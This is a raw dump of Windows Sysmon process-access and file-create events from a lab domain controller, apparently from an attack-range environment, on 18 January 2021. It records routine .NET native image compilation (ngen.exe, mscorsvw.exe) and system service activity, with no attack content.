13:50:36.508{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-922C-6005-1104-00000000A301}4296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:36.508{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-922C-6005-1104-00000000A301}4296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:36.446{59A5CD1D-922C-6005-1004-00000000A301}4232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1088-0\System.ComponentModel.Composition.Registration.dll2021-01-18 13:50:36.446 10341000x80000000000000008297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:36.337{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-922C-6005-1004-00000000A301}4232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:36.321{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-922C-6005-1004-00000000A301}4232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:36.321{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-922C-6005-1004-00000000A301}4232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:36.258{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-922C-6005-0F04-00000000A301}4816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:36.243{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-922C-6005-0F04-00000000A301}4816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:36.243{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-922C-6005-0F04-00000000A301}4816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:36.165{59A5CD1D-922B-6005-0E04-00000000A301}3804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\edc-0\System.ComponentModel.Composition.dll2021-01-18 13:50:36.165 10341000x80000000000000008318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:37.430{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-922D-6005-1604-00000000A301}4640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:37.430{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-922D-6005-1604-00000000A301}4640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:37.430{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-922D-6005-1604-00000000A301}4640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:37.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-922D-6005-1504-00000000A301}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:37.040{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-922D-6005-1504-00000000A301}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:37.040{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-922D-6005-1504-00000000A301}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:44.899{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9234-6005-1704-00000000A301}4204C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:44.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:44.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:44.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:44.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:44.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:44.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:44.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:44.899{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 